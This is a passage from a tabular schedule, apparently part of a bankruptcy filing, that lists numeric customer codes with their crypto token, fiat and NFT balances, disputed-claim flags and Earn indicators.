NFT [536039492705387865/DOTB #2540][1], NFT [536587699883772748/DOTB #6606][1], NFT [546943677346512971/DOTB #8592][1], NFT [548707336863631323/Mad Lions Remastered #27][1], NFT [551171981987309062/DOTB #4337][1], NFT [554338060055172862/DOTB #5412][1], NFT [564514471598461575/DOTB #8265][1], PAXG[0.00029654], SGD[0.00], SHIB[853233.21149144], SOL[0.20583549], SUSHI[0], TRX[1], UNI[0.02620881], USD[1.93], USDT[0.00001590], YFI[0.00002013] | Yes | |
| 07340535 | | BAT[1], BRZ[1], DOGE[1.64886897], ETH[.00005129], ETHW[.00005129], GRT[.00004114], TRX[4], USD[0.01] | | |
| 07340536 | | BRZ[0], SOL[0], SUSHI[0], USD[0.03], USDT[0] | Yes | |
| 07340537 | | USD[10.00] | | |
| 07340538 | | USD[5.00] | | |
| 07340539 | | USD[10.00] | | |
| 07340540 | | CUSDT[1], TRX[1], USD[0.02] | | |
| 07340541 | | CUSDT[3], DOGE[629.86822718], TRX[1], USD[0.00] | Yes | |
| 07340542 | | USD[10.00] | | |
| 07340543 | | CUSDT[8], DOGE[.00153416], KSHIB[94.90545613], SOL[.16579502], TRX[.00077153], USD[0.18] | Yes | |
| 07340544 | | DOGE[.40894982], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340545 | | CUSDT[1], DOGE[1], USD[0.00] | | |
| 07340546 | | DOGE[1], ETH[.00507583], ETHW[.00507583], TRX[2], UNI[3.12671105], USD[0.00] | | |
| 07340547 | | USD[10.00] | | |
| 07340548 | | USD[10.00] | | |
| 07340549 | | BAT[2], BRZ[1], CUSDT[3], GRT[3], SHIB[1], TRX[1], USD[11276.42], USDT[1] | | |
| 07340550 | | USD[10.00] | | |
| 07340551 | | BAT[1], BRZ[1], CUSDT[2], DOGE[6540.42696173], GRT[1], USD[0.00], USDT[2] | | |
| 07340552 | | USD[10.00] | | |
| 07340553 | | DOGE[136.54136356], USD[0.00] | | |
| 07340554 | | USD[0.00] | | |
| 07340555 | | USD[10.00] | | |
| 07340556 | | USD[10.00] | | |
| 07340557 | | BTC[.0001741], USD[0.00] | | |
| 07340558 | | USD[10.00] | | |
| 07340559 | | USD[0.00] | | |
| 07340560 | | USD[0.01] | | |
| 07340561 | | BAT[1.00528332], BRZ[0], BTC[0], CUSDT[22], DAI[254.06407773], DOGE[0], ETH[0], ETHW[0], GRT[.01281213], LINK[.00047204], MATIC[0], PAXG[1.15671822], SHIB[1], SOL[0], SUSHI[0], TRX[18.13189175], USD[0.00], USDT[0.00037988], YFI[0] | Yes | |
| 07340562 | | CUSDT[13], DOGE[826.61701477], SHIB[2205684.71242224], TRX[2], USD[0.00] | | |
| 07340563 | | BTC[0.00033337], DOGE[197.73079747], USD[0.00] | Yes | |
| 07340564 | | USD[0.12] | | |
| 07340565 | | BTC[.0000858], DOGE[.067], USD[27.79] | | |
| 07340566 | | USD[10.00] | | |
| 07340567 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07340570 | | TRX[302.15801861], USD[0.00] | Yes | |
| 07340571 | | USD[10.00] | | |
| 07340572 | | USD[10.00] | | |
| 07340573 | | BRZ[1], CUSDT[1], GRT[.00096365], TRX[2], USD[0.00] | Yes | |
| 07340574 | | USD[10.00] | | |
| 07340575 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07340576 | | BRZ[1], DOGE[1], USD[0.00] | | |
| 07340577 | | DOGE[0], SOL[0], USD[0.00] | | |
| 07340578 | | BAT[9.03421782], BRZ[2], CUSDT[7], DOGE[0], ETH[0.18459532], ETHW[0.18435457], LTC[1.39148361], SHIB[1012887.93723459], TRX[94.51606195], USD[8.03] | Yes | |
| 07340579 | | BTC[0], GRT[0], USD[0.01] | | |
| 07340581 | | USD[10.00] | | |
| 07340582 | | BAT[9.40607101], CUSDT[2], DOGE[2], GRT[0], LINK[0], USD[0.00] | | |
| 07340584 | | DOGE[25.89034769], USD[0.00] | | |
| 07340585 | | USD[10.00] | | |
| 07340586 | | CUSDT[1], DOGE[497.15470615], TRX[1], USD[0.00] | | |
| 07340587 | | USD[10.00] | | |
| 07340588 | | BCH[.00021121], BRZ[3], BTC[0.00014912], CAD[0.00], CUSDT[2.05760644], DOGE[4743.88854150], ETH[0.39544585], ETHW[0.39544585], GRT[2.06484979], LINK[5.12007732], SOL[0.05251425], SUSHI[1.01558304], TRX[7.22090256], USD[0.07], USDT[5] | | |
| 07340589 | | USD[10.00] | | |
| 07340590 | | USD[10.00] | | |
| 07340591 | | BTC[.00020347], USD[0.00] | | |
| 07340592 | | USD[10.00] | | |
| 07340593 | | BRZ[66.17214006], BTC[.00597163], CUSDT[642.54699077], DOGE[2811.90476585], ETH[.03305477], ETHW[.03264407], KSHIB[477.82596858], LTC[.33501525], MATIC[11.2922978], NFT [342937185310363846/Crystal Face #17][1], SHIB[714129.57869189], SOL[.76450379], TRX[534.0285387], USD[3.89] | Yes | |
| 07340594 | | USD[10.00] | | |
| 07340595 | | CUSDT[3], DOGE[137.2735607], TRX[1], USD[0.00] | | |
| 07340596 | | USD[10.00] | | |
| 07340597 | | USD[0.00] | | |
| 07340598 | | CUSDT[6], DOGE[2.0004505], ETH[0], TRX[1], USD[0.00] | Yes | |
| 07340599 | | TRX[174.79849666], USD[0.00] | | |
| 07340600 | | DOGE[99.10500913], USD[0.00] | | |
| 07340601 | | BRZ[0], CUSDT[11], DOGE[31172.64270033], ETH[.00000001], ETHW[0], TRX[0], USD[0.00] | Yes | |
| 07340602 | | BRZ[0.00122388], DOGE[1], LINK[0.00001741], UNI[0], USD[0.00], USDT[0] | | |
| 07340603 | | USD[10.00] | | |
| 07340604 | | USD[10.00] | | |
| 07340605 | | CUSDT[2], DOGE[40.46224431], USD[2.09] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340606 | | CUSDT[3], USD[0.00] | | |
| 07340607 | | USD[10.00] | | |
| 07340608 | | USD[0.02] | | |
| 07340609 | | USD[10.00] | | |
| 07340610 | | BRZ[1], CUSDT[1], USD[0.00], USDT[0] | | |
| 07340611 | | USD[10.00] | | |
| 07340612 | | BRZ[1], CUSDT[1], DOGE[1], SOL[.41705616], USD[0.00] | Yes | |
| 07340613 | | CUSDT[1], USD[0.00] | | |
| 07340614 | Contingent, Disputed | USD[10.00] | | |
| 07340616 | | USD[10.00] | | |
| 07340617 | | USD[10.98] | Yes | |
| 07340618 | | BTC[.01906085], CUSDT[3], DOGE[1093.4190266], ETH[.06112668], ETHW[.06036796], SHIB[2408657.01931497], SOL[2.12238081], TRX[3], USD[0.01] | Yes | |
| 07340619 | | USD[10.00] | | |
| 07340620 | | CUSDT[2], DOGE[2134.90598861], USD[0.00] | | |
| 07340621 | | BRZ[0], DOGE[1.10681509], USD[0.00] | Yes | |
| 07340622 | | USD[10.00] | | |
| 07340623 | | CUSDT[1], DOGE[1.10636554], TRX[1], USD[0.00] | | |
| 07340624 | | USD[10.00] | | |
| 07340625 | | BRZ[2], CUSDT[2], DOGE[1.00042315], TRX[1.83995124], USD[0.01], USDT[0] | | |
| 07340626 | | GRT[0], TRX[129.24672825], USD[0.00] | | |
| 07340627 | | USD[10.00] | | |
| 07340628 | | USD[10.00] | | |
| 07340630 | | USD[10.00] | | |
| 07340631 | | USD[10.00] | | |
| 07340632 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07340633 | | DOGE[140.80600171], USD[0.00] | | |
| 07340634 | | USD[10.00] | | |
| 07340635 | | USD[0.55] | | |
| 07340637 | | USD[0.00] | | |
| 07340638 | | USD[9.73] | | |
| 07340639 | | CUSDT[7], DOGE[1], NFT[533525643472858334/Carmen #15[1], SHIB[1], SOL[.7658068], TRX[1], USD[0.00] | Yes | |
| 07340640 | | CUSDT[7], DOGE[92.55820501], SHIB[284171.63981244], TRX[2], USD[10.00], USDT[.9938114] | | |
| 07340641 | | CUSDT[1], DOGE[3609.25347650], USD[0.00] | | |
| 07340642 | | BAT[.00347562], USD[0.00] | | |
| 07340643 | | BRZ[1], BTC[0], DOGE[0.00520770], ETH[0], SHIB[5.02357308], USD[0.00] | Yes | |
| 07340644 | | BCH[0], BRZ[0], BTC[0], DOGE[0], LTC[0], TRX[0], USD[12.12], USDT[0] | Yes | |
| 07340645 | | USD[10.00] | | |
| 07340646 | | USD[10.00] | | |
| 07340647 | | BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], SOL[0], SUSHI[0], TRX[0], USD[0.01], USDT[0] | | |
| 07340648 | | BRZ[1], USD[0.00], USDT[0] | | |
| 07340649 | | USD[10.00] | | |
| 07340650 | | USD[10.00] | | |
| 07340651 | | CUSDT[1], ETH[0.00605912], ETHW[0.00598462], USD[0.00] | Yes | |
| 07340652 | | BTC[0], CUSDT[1], DOGE[4157.05216086], USD[0.00], USDT[0] | Yes | |
| 07340653 | | USD[0.00] | | |
| 07340654 | | CUSDT[1], DOGE[1000.0000065], TRX[1], USD[0.01] | | |
| 07340655 | | BTC[.00020775], CUSDT[4], DOGE[1.54317514], LTC[.07436368], SHIB[1], TRX[2], USD[0.06] | | |
| 07340656 | | USD[10.00] | | |
| 07340657 | | DOGE[1], USD[41.00], USDT[0.00000001] | Yes | |
| 07340658 | | BTC[0.00100881], USD[0.00] | | |
| 07340659 | | BTC[0.00002704], DOGE[5854.70761736], SHIB[665088.84806597], USD[0.00] | Yes | |
| 07340662 | | CUSDT[471.07179697], TRX[1], USD[0.00] | | |
| 07340663 | | USD[10.00] | | |
| 07340664 | | USD[0.00], USDT[1] | | |
| 07340665 | | BTC[0.00001514], USD[2.30] | | |
| 07340666 | | BRZ[1], GRT[1], SHIB[1], SOL[.00000001], SUSHI[.00104576], USD[0.00] | Yes | |
| 07340668 | | DOGE[137.36469405], USD[0.00] | | |
| 07340669 | | BRZ[2], CUSDT[12], DOGE[3], SHIB[4300407.13604091], TRX[6], USD[0.00], USDT[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340670 | | USD[0.00] | | |
| 07340671 | | ETH[0], USD[0.00] | Yes | |
| 07340672 | | USD[10.00] | | |
| 07340673 | | DOGE[1658.22170437], USD[0.00] | | |
| 07340674 | | BTC[.00002566], DOGE[36.11995583], SHIB[0], USD[0.00] | Yes | |
| 07340675 | | USD[10.00] | | |
| 07340676 | | DOGE[1], USD[0.01] | | |
| 07340677 | | BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], UNI[0], USD[0.00] | | |
| 07340678 | | AVAX[3.1992522], BAT[88.63418001], BTC[0.10001113], DOGE[11797.28578211], ETH[0.56485637], ETHW[0.56461384], LINK[10.68812644], SHIB[66377553.60101033], SOL[26.3960057], USD[0.01], USD[10] | Yes | |
| 07340679 | | BRZ[2], BTC[0], CUSDT[8], DOGE[0], ETH[0], LINK[0], LTC[0], UNI[0], USD[0.00], USD[0.00] | | |
| 07340680 | | BTC[.00000002], CUSDT[3], DOGE[3.00003849], SOL[.00044966], SUSHI[.00005281], TRX[.00096993], USD[26.53] | | |
| 07340681 | | DOGE[1], USD[10.35] | Yes | |
| 07340682 | | DOGE[1], ETH[.03451292], ETHW[.03451292], TRX[2], USD[10.00] | | |
| 07340683 | | CUSDT[2], ETH[.00702337], ETHW[.00694129], SHIB[2], USD[0.54] | Yes | |
| 07340684 | | USD[10.00] | | |
| 07340685 | | DOGE[35.38269716], USD[0.00] | Yes | |
| 07340686 | | DOGE[106.09497913], SHIB[71384.90587855], USD[0.00] | | |
| 07340687 | | BAT[1], CUSDT[3], DOGE[4025.89136127], TRX[1], UNI[1], USD[0.00], USDT[1] | | |
| 07340688 | | USD[10.00] | | |
| 07340689 | | USD[10.00] | | |
| 07340690 | | USD[10.00] | | |
| 07340691 | | CUSDT[1], DOGE[7346.00914702], TRX[1], USD[12.20] | | |
| 07340692 | | CUSDT[2], DOGE[6.17116216], MATIC[40.91552608], TRX[57.5876929], USD[0.70] | Yes | |
| 07340693 | | USD[10.00] | | |
| 07340694 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], NFT (297627199603870589/Imola Ticket Stub #1123)[1], NFT (331137753645014158/Entrance Voucher #2601)[1], SOL[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07340695 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07340696 | | AAVE[1.61838], BTC[.030778], DOGE[845.154], ETH[.05237308], ETHW[.05237308], GRT[371.29], SOL[0], SUSHI[50.84], UNI[15.178092], USD[1.04], USDT[4.4361486] | | |
| 07340697 | | USD[0.00] | | |
| 07340698 | | USD[10.00] | | |
| 07340699 | | DOGE[0] | | |
| 07340700 | | USD[10.00] | | |
| 07340701 | | USD[10.00] | | |
| 07340702 | | USD[0.03] | Yes | |
| 07340703 | | DOGE[1], USD[0.00] | | |
| 07340704 | | DOGE[0], SOL[0], USD[0.00] | | |
| 07340705 | | DOGE[188.7387514], USD[0.00] | | |
| 07340706 | | USD[10.00] | | |
| 07340707 | | CUSDT[7], DOGE[0], TRX[1], USD[0.00] | | |
| 07340708 | | BRZ[2], BTC[.0326935], CUSDT[1], DOGE[1.05978817], ETH[0.59797262], ETHW[0.59797262], SHIB[661288.18939293], TRX[4], USD[0.43], USDT[1] | | |
| 07340709 | | USD[10.00] | | |
| 07340710 | | CUSDT[1], DOGE[174.445869], USD[0.00] | Yes | |
| 07340711 | | BTC[0], DOGE[0], USD[10.00] | | |
| 07340712 | | CUSDT[1], GRT[6.24262327], USD[0.00] | Yes | |
| 07340713 | | USD[10.00] | | |
| 07340714 | | USD[10.00] | | |
| 07340715 | | ETH[.00000047], ETHW[.0000047], TRX[1], USD[0.00] | Yes | |
| 07340717 | | USD[0.00] | | |
| 07340718 | | BTC[.00065275], CUSDT[7], DOGE[.02075855], LINK[1.46640117], TRX[1], USD[0.00], USDT[.0001272] | Yes | |
| 07340719 | | USD[10.00] | | |
| 07340720 | | USD[10.00] | | |
| 07340721 | Contingent, Disputed | BRZ[.00006447], CUSDT[3.00044067], NFT (353410750113695484/La Vie Sombre #0001)[1], NFT (421551259328137241/Perfect morning )[1], NFT (512166814159828879/Geralt Polygon 3D Portre #2)[1], NFT (561091751529265393/Yennefer Polygon 3D Portre)[1], NFT (571100279448271618/Imola Ticket Stub #2020)[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07340722 | | BRZ[0], DOGE[134357.77655798], USD[0.00], USDT[0.00087454] | Yes | |
| 07340723 | | USD[0.07] | | |
| 07340724 | | ALGO[1124.94052625], BTC[.0059823], ETH[.00000001], ETHW[0], LTC[33.09587728], NFT (386348623620443145/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #54)[1], TRX[0], USD[0.00] | | |
| 07340725 | | DAI[3.8844], DOGE[0], ETH[0.17836303], ETHW[0.17836303], LINK[0], LTC[0], SOL[0], TRX[2836.88096616], USD[0.07] | | |
| 07340726 | | BAT[.05723671], BTC[0.00327113], CUSDT[7], DOGE[139.08289446], SUSHI[.00002135], TRX[4.00044779], USD[0.00], YFI[.00054326] | Yes | |
| 07340727 | | CUSDT[2], TRX[3], USD[0.68] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340728 | | USD[10.00] | | |
| 07340730 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07340731 | | BRZ[1], CUSDT[3], DOGE[1814.56876081], ETH[.0197854], ETHW[.01953898], USD[0.00] | Yes | |
| 07340732 | | CUSDT[2], LINK[0], SHIB[1], USD[0.00], USDT[46.69784193] | | |
| 07340733 | Contingent, Disputed | USD[10.89] | Yes | |
| 07340734 | | USD[10.00] | | |
| 07340735 | | BRZ[0], EUR[0.00], SHIB[2210970.46515209], TRX[1.00002835], USD[0.00] | Yes | |
| 07340736 | | CUSDT[1], TRX[3], USD[0.00] | | |
| 07340737 | | DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07340738 | | BRZ[2], CUSDT[2], TRX[2], USD[0.00] | | |
| 07340739 | | USD[10.00] | | |
| 07340740 | | USD[10.00] | | |
| 07340741 | | USD[10.00] | | |
| 07340742 | | BAT[0.87019441], BRZ[2], BTC[0], CUSDT[32], DAI[0.20318567], DOGE[2.00448551], ETH[0.00004221], ETHW[0.00004221], GRT[0.95579472], LINK[0.00807250], LTC[.00002874], SOL[0.00323603], SUSHI[0.0010545.2], TRX[1.14656253], UNI[0.00009236], USD[0.00], USDT[0.01000616], YFI[0.00000006] | Yes | |
| 07340743 | | CUSDT[1], DOGE[43.70662585], SHIB[2], TRX[2], USD[0.81] | | |
| 07340745 | | USD[0.00], USDT[1] | | |
| 07340746 | | USD[10.00] | | |
| 07340747 | | DOGE[0], USD[0.00] | | |
| 07340748 | | TRX[1], USD[0.00] | | |
| 07340749 | | DOGE[9], TRX[2], USD[0.00] | | |
| 07340750 | | SOL[.0574831], TRX[5], USD[0.00] | Yes | |
| 07340751 | | BAT[0], BRZ[0], DOGE[1], GRT[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07340752 | | AAVE[.00000025], BTC[.00010739], CUSDT[2], DOGE[1], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07340753 | | USD[10.00] | | |
| 07340754 | | USD[10.00] | | |
| 07340755 | | USD[10.00] | | |
| 07340756 | | DOGE[0], GRT[0], SHIB[5994628.88924263], USD[0.00] | Yes | |
| 07340757 | | USD[10.00] | | |
| 07340759 | | BRZ[1], SOL[0.00002081], SUSHI[.00001745], USD[0.00] | Yes | |
| 07340760 | | BRZ[1], CUSDT[1], DOGE[82.96758742], USD[0.00] | | |
| 07340761 | | USD[10.00] | | |
| 07340762 | | DOGE[1.00003497], LINK[1], USD[0.00] | | |
| 07340763 | | USD[10.00] | | |
| 07340764 | | USD[0.00] | Yes | |
| 07340765 | | ETH[.02535031], ETHW[0.02535030], USD[10.00] | | |
| 07340766 | | USD[0.01] | Yes | |
| 07340767 | | USD[10.00] | | |
| 07340768 | | USD[10.00] | | |
| 07340769 | | GRT[9.78515025], USD[0.00] | Yes | |
| 07340770 | | ETH[.00301438], ETHW[.00301438], USD[0.00] | | |
| 07340771 | | BCH[0], BTC[0], CUSDT[16], DOGE[161.69346737], ETH[0], LINK[0], LTC[0], TRX[1], USD[0.00] | Yes | |
| 07340772 | | USD[10.60] | Yes | |
| 07340773 | | DOGE[0], USD[0.01] | | |
| 07340774 | | BRZ[1], CUSDT[1], DOGE[4], SUSHI[.00002089], USD[25.62] | | |
| 07340775 | | USD[10.00] | | |
| 07340776 | | USD[0.00] | | |
| 07340777 | | USD[10.00] | | |
| 07340778 | | USD[10.00] | | |
| 07340779 | | USD[10.00] | | |
| 07340780 | | CUSDT[51.70646992], DOGE[2145.85835991], ETH[.02487248], ETHW[.02487248], SHIB[121214.12121212], TRX[85.29346932], USD[4.00] | | |
| 07340781 | | USD[10.00] | | |
| 07340782 | | USD[10.00] | | |
| 07340783 | | USD[0.02] | | |
| 07340784 | | USD[10.00] | | |
| 07340785 | | DOGE[3.000548], ETH[1.27073198], ETHW[1.27019838], SOL[59.28469103], TRX[120.39297301], UNI[2.25694684], USD[0.00], USDT[0] | Yes | |
| 07340786 | | USD[10.00] | | |
| 07340788 | | DOGE[21.47099781], USD[0.00] | | |
| 07340789 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340790 | | BTC[.00011875], DOGE[10.6867548], GRT[3.5314218], USD[0.00] | | |
| 07340791 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07340792 | | USD[10.00] | | |
| 07340793 | | DOGE[207.38308674], USD[0.00] | | |
| 07340794 | | CUSDT[2], DOGE[11663.98703154], TRX[868.8190146], USD[0.00] | | |
| 07340796 | | DOGE[110.72032844], USD[10.00] | | |
| 07340797 | | DOGE[.712], ETH[.000792], ETHW[.000792], USD[78.13] | | |
| 07340798 | | BRZ[3], CUSDT[12], DOGE[3], ETH[.00803202], ETHW[0.00793619], GRT[1.00498957], SHIB[36], TRX[10.00087675], USD[0.01], USDT[0] | Yes | |
| 07340799 | | USD[10.00] | | |
| 07340800 | Contingent, Disputed | DOGE[0], ETH[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07340801 | | SOL[1.05304333], USD[0.00] | | |
| 07340802 | | USD[10.00] | | |
| 07340803 | | DOGE[0], ETH[0], USD[0.35], USDT[0] | Yes | |
| 07340804 | | USD[10.00] | | |
| 07340805 | | USD[10.00] | | |
| 07340806 | | USD[0.00] | | |
| 07340807 | | CUSDT[1], SOL[0], TRX[1], USD[0.00] | | |
| 07340808 | | USD[10.00] | | |
| 07340809 | | CUSDT[2], DOGE[3986.53561461], TRX[2], USD[0.00] | | |
| 07340810 | | USD[10.00] | | |
| 07340811 | | USD[10.00] | | |
| 07340812 | | CUSDT[2], DOGE[1728.71641617], ETH[.00144642], ETHW[.00144642], TRX[1], USD[0.00] | | |
| 07340813 | | USD[10.00] | | |
| 07340814 | | DOGE[67.48749456], TRX[106.89022971], USD[0.00] | | |
| 07340815 | | USD[10.00] | | |
| 07340816 | | USD[110.00] | | |
| 07340817 | | USD[10.00] | | |
| 07340818 | | CUSDT[468.00419144], USD[0.00] | | |
| 07340819 | | DOGE[0], ETH[1.10251466], ETHW[0.00000994], SHIB[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07340820 | | USD[10.00] | | |
| 07340821 | | USD[10.00] | | |
| 07340822 | | USD[10.00] | | |
| 07340823 | | USD[10.00] | | |
| 07340826 | | BTC[.00057832], DOGE[1], USD[10.00] | | |
| 07340827 | | USD[10.00] | | |
| 07340828 | | BRZ[1], CUSDT[2], DOGE[5273.61653268], SHIB[22453538.59392599], USD[0.00] | | |
| 07340829 | | BTC[.00210952], CUSDT[1], DOGE[2806.61054675], TRX[3], USD[250.00] | | |
| 07340830 | | USD[10.00] | | |
| 07340831 | | USD[10.00] | | |
| 07340832 | | USD[10.00] | | |
| 07340833 | | BAT[5.53264462], BCH[0], BRZ[1], BTC[0], CUSDT[24], DOGE[1], ETH[0], LTC[0], MATIC[0], SOL[0], TRX[32.08873391], USD[54.59], USDT[0.00000388] | Yes | |
| 07340834 | | BAT[1], CUSDT[4], DOGE[1], TRX[2], USD[0.01], USDT[1] | | |
| 07340835 | | BRZ[1], CUSDT[1], TRX[2], USD[102.83] | | |
| 07340836 | | CUSDT[1], SHIB[214726.66825586], TRX[1], USD[0.00] | Yes | |
| 07340837 | | BTC[.00000246], DOGE[0], ETH[0], KSHIB[265.69478197], SHIB[269222.02646865], TRX[0], USD[0.00], YFI[0] | | |
| 07340838 | | BAT[35.48346386], USD[10.00] | | |
| 07340840 | | USD[0.00] | Yes | |
| 07340841 | | BRZ[0], CUSDT[1], DOGE[1], TRX[1], USD[0.01], USDT[0.00000001] | Yes | |
| 07340842 | | USD[10.00] | | |
| 07340843 | | BRZ[0.00321740], USD[0.00] | | |
| 07340844 | | DOGE[1], USD[0.01] | | |
| 07340845 | | CUSDT[10], GRT[1.00491613], USD[0.00] | Yes | |
| 07340846 | | CUSDT[5], DOGE[4271.76815532], KSHIB[10535.63150575], SHIB[1676633.38283026], TRX[1], USD[1.80] | Yes | |
| 07340847 | | USD[10.00] | | |
| 07340848 | | CUSDT[6], USD[0.01] | | |
| 07340849 | | BTC[.00021891], DOGE[.00816241], GRT[1], USD[0.29] | | |
| 07340850 | | DOGE[2], ETH[.00005388], ETHW[.00005388], GRT[1], TRX[1], USD[10.00] | | |
| 07340851 | | DOGE[5.1426822], SOL[0], SUSHI[0.00040046], TRX[3], USD[0.00], USDT[0.00000003] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340852 | | ETH[.00000001], SOL[0], USD[0.91], USDT[0.00000001] | | |
| 07340853 | | ETH[0], GRT[0], USD[0.03], USDT[0] | | |
| 07340854 | | TRX[1], USD[0.01] | | |
| 07340855 | | CUSDT[4], DOGE[1], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07340856 | | USD[10.00] | | |
| 07340858 | | DOGE[862.76533304], USD[0.00] | Yes | |
| 07340859 | | USD[809.57] | Yes | |
| 07340860 | | USD[10.00] | | |
| 07340861 | | TRX[162.58947774], USD[0.00] | | |
| 07340862 | | BAT[.00003767], DOGE[.00003377], USD[0.00] | | |
| 07340863 | | USD[10.00] | | |
| 07340864 | | CUSDT[1], DOGE[172.75734192], USD[0.00] | | |
| 07340865 | | USD[10.00] | | |
| 07340866 | | USD[10.00] | | |
| 07340867 | | BRZ[2], CUSDT[9], GRT[1.00313735], TRX[5], USD[0.01] | Yes | |
| 07340868 | | CUSDT[1], DOGE[43.23628895], SHIB[94042.45537075], USD[0.00] | | |
| 07340869 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07340870 | | USD[10.00] | | |
| 07340871 | | USD[10.00] | | |
| 07340872 | | DOGE[26.0741983], USD[0.00] | | |
| 07340873 | | USD[10.00] | | |
| 07340874 | | USD[10.00] | | |
| 07340875 | | BRZ[1], DOGE[2949.52811358], USD[11.55] | | |
| 07340876 | | DOGE[707.65528913], USD[10.00] | | |
| 07340877 | | DOGE[1], USD[0.01] | | |
| 07340878 | | USD[10.00] | | |
| 07340880 | | BRZ[2], BTC[.04270169], CUSDT[2], SHIB[1402153.96640405], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07340881 | | CUSDT[2], DOGE[470.02363693], ETH[.00359971], ETHW[.00359971], GBP[14.14], SOL[.11013472], TRX[156.20874334], USD[46.75] | | |
| 07340882 | | USD[10.00] | | |
| 07340883 | | CUSDT[2], DOGE[132.39286937], USD[0.19] | | |
| 07340884 | | BRZ[1], CUSDT[2], DOGE[0], TRX[6], USD[0.00] | | |
| 07340885 | | TRX[163.04824564], USD[0.00] | | |
| 07340886 | | USD[10.00] | | |
| 07340887 | | BAT[1], BRZ[4], CUSDT[5], DOGE[3], ETH[.0036629], ETHW[.0036629], TRX[4], USD[0.00], USDT[1] | | |
| 07340888 | | USD[10.00] | | |
| 07340889 | | USD[10.00] | | |
| 07340890 | | BTC[.00137339], CUSDT[1], DOGE[0.30364745], USD[10.40] | | |
| 07340891 | | BAT[1.00208213], BRZ[.83467914], CUSDT[13], SHIB[12], TRX[4], USD[2.78], USDT[0.08496818] | Yes | |
| 07340892 | | BAT[46.98837341], BRZ[7], BTC[.00509453], CUSDT[23], DOGE[3], ETH[.00200702], ETHW[.00200702], SHIB[2], SOL[1.08343276], TRX[10], USD[0.01] | | |
| 07340894 | | USD[10.00] | | |
| 07340895 | | BTC[0], CUSDT[6], DOGE[1], ETH[0], ETHW[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07340896 | | USD[10.00] | | |
| 07340897 | | USD[10.00] | | |
| 07340898 | | USD[10.00] | | |
| 07340899 | | CUSDT[1], DOGE[0], USD[0.00] | | |
| 07340900 | | TRX[2], USD[0.01] | | |
| 07340901 | | DOGE[177.0531347], USD[0.00] | | |
| 07340902 | | CUSDT[3], DOGE[1], LINK[.0000108], SHIB[6], TRX[2], USD[0.00] | Yes | |
| 07340903 | | CUSDT[1], DOGE[475.29303273], USD[0.00] | | |
| 07340904 | | USD[10.00] | | |
| 07340906 | | USD[10.00] | | |
| 07340907 | | CUSDT[1], GRT[1], SHIB[1625223.46822688], USD[0.00] | | |
| 07340908 | | USD[10.00] | | |
| 07340909 | | DOGE[1], USD[0.01] | | |
| 07340910 | | USD[10.00] | | |
| 07340911 | | DOGE[24.92652222], USD[0.00] | | |
| 07340912 | | USD[10.00] | | |
| 07340913 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07340914 | | USD[0.00], USDT[0.00000001] | Yes | |
| 07340915 | | BTC[0], DOGE[1517.85652133], ETH[0.00000042], ETHW[0.08368825], SHIB[48], TRX[2], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07340916 | | USD[10.00] | | |
| 07340917 | | BAT[111.75115083], BRZ[1], CUSDT[1042.1497225], DOGE[0], ETH[0.20412574], ETHW[0.20412574], TRX[917.02533272], USD[7.93] | | |
| 07340918 | | USD[0.00] | | |
| 07340919 | | USD[0.00] | Yes | |
| 07340920 | | DOGE[0], LINK[0], TRX[0], USD[0.00] | | |
| 07340921 | | USD[10.00] | | |
| 07340922 | | USD[10.00] | | |
| 07340923 | | ETH[.00000587], ETHW[.00000587], USD[0.00] | Yes | |
| 07340924 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07340925 | | USD[0.00] | Yes | |
| 07340926 | | USD[10.00] | | |
